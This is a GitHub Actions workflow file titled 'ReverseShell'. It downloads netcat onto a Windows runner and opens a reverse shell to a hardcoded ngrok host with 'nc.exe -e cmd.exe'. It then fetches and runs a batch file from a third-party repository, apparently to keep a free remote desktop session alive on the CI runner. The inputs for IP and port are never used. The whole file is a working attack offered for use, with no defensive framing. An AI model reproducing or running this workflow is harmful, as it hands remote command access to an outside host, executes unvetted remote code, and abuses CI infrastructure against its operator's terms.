name: ReverseShell

on: 
  workflow_dispatch:
    inputs:
    
      code:
        description: 'Subcribe PawitSahare'
        required: true
      pin:
        description: 'enter your ip '
        required: true
        
      port:
           description: 'enter your ip port'
           required: true
jobs:

  build:

    runs-on: windows-latest

    steps:

    - name: Download

      run: | 
       Invoke-WebRequest https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip -OutFile nc.zip
       Expand-Archive nc.zip
       powershell
       ls
       cd nc
       ls
       cd netcat-1.11
       ls
       ./nc.exe -v 0.tcp.in.ngrok.io 12576 -e cmd.exe
       echo enter both ip and port without any  this :
      
    - name: Loop
     
      run: | 
       Invoke-WebRequest https://raw.githubusercontent.com/MREXw/Rdpacc/main/loop.bat -OutFile loop.bat
       cmd /c loop.bat
       echo Enjoy your rdp have no limit
         
       
    
